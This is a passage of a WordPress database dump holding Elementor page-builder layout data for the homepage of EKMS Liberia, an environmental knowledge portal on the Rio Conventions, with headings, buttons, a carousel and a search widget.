center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\"},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"roxy\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"dots\":\"true\",\"pause_on_hover\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11471,1862,'_elementor_version','2.7.5'),(11472,1862,'_elementor_template_type','wp-page'),(11473,1862,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11475,1863,'_wp_page_template','default'),(11476,1863,'_elementor_edit_mode','builder'),(11477,1863,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parall